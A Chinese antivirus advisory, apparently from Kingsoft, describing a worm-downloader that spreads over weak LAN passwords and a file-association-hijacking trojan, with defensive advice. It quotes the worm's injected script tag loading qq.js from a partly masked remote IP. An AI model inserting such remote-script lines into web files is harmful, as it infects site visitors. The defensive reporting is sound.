扫一扫
分享文章到微信
扫一扫
关注官方公众号
至顶头条
"感染虫下载器45056"(Win32.Troj.Downloader.c.45056)这是一个蠕虫病毒。该病毒运行后,会指定的网络上下载病毒程序,并且会搜索局域网内机器,以弱口令进行尝试性连接,一旦连接成功,则判断该机器弱口令是否有足够的权限,有则向该远程机器发送恶意数据,然后利用Windows漏洞来下载程序,予以执行。
"老人参"(Win32.Troj.Dropper.ex.4232192)这是一个极为恶劣的木马程序。病毒运行后释放病毒文件至系统文件夹外,修改用户注册表,修改指定的扩展名,还会修改浏览器主页。
一、"感染虫下载器45056"(Win32.Troj.Downloader.c.45056) 威胁级别:★★
该病毒的最大特点在于感染。当病毒成功运行后,会在%system32%下产生两个病毒文件,分别是tmipo.bat和taimpo.txt,使用taimpo.bat批处理文件结束“360安全卫士”,使用户的系统安全性大大降低。病毒会连接远程机器,当该病毒检测远程机器是使用弱口令为登录系统密码时,将会进攻该机器,在该机器种下adi.vbs脚本病毒。并从http://218.**.**.248/下载病毒文件window.exe。当这些病毒文件都下载后,该病毒则开始利用遍历文件的方法,只要发现机器上文件格式为"*.htm、*.PHP、*.ASP"时,则会插入一段病毒脚本,内容为:
script language=javascript src=http://218.**.**.248/qq.js
当用户打开网页时,毒霸则会不停的报病毒。给用户带来巨大的系统危害和心理压力。而且该病毒是通过系统漏洞传播的,所以提醒用户要打好系统补丁,未雨绸缪。
二、"老人参"(Win32.Troj.Dropper.ex.4232192) 威胁级别:★★
该病毒运行后,会在系统的临时文件夹(%temp%)下生成start.exe病毒文件,并且会在%system32%下生成laorenshen.exe病毒文件。该病毒会修改注册表HKEY_CLASSES_ROOT下众多键值,通过修改键值来改变其关联方式。该病毒修改以下文件格式
.mp3、.RM、.DAT、.AVI、.TXT、.COM、.ZIP、.RAR、.REG、.DLL、.BAT、.SYS、.INI、.LOG、.BIN、.DOC
的关联方式,将其关联方式修改为病毒文件Laorenshen.exe,并且会把被修改过的文件改变其图标,只要用户点击以上文件格式的文件,将会触发Laorenshen.exe病毒文件。这样,被感染的文件已经无法使用,且会弹出一个消息框,其内容为
"我叫‘垃圾参’,是‘人参’的新品种,有很高的营养价值和医用价值,特别适合爱美的女性朋友,听说,俺还预防‘非典’哪!"
同时释放的还有FoxPro主程序文件,病毒运行时会同时运行此程序,如果用户机子有安装FoxPro时,会打开FoxPro。浏览器的主页被修改为:"hxxp://www.m**f.com/"。该病毒会给用户的系统带来极大的危害。
金山反病毒工程师建议
1.最好安装专业的杀毒软件进行全面监控。建议用户安装反病毒软件防止日益增多的病毒,用户在安装反病毒软件之后,应该经常进行升级、将一些主要监控经常打开(如邮件监控、内存监控等),遇到问题要上报, 这样才能真正保障计算机的安全。
2.玩网络游戏、利用QQ聊天的用户会有所增多,所以各类盗号木马必将随之增多,建议用户一定要养成良好的网络使用习惯,及时升级杀毒软件,开启防火墙以及实时监控等功能,切断病毒传播的途径,不给病毒以可乘之机。
如果您非常迫切的想了解IT领域最新产品与技术信息,那么订阅至顶网技术邮件将是您的最佳途径之一。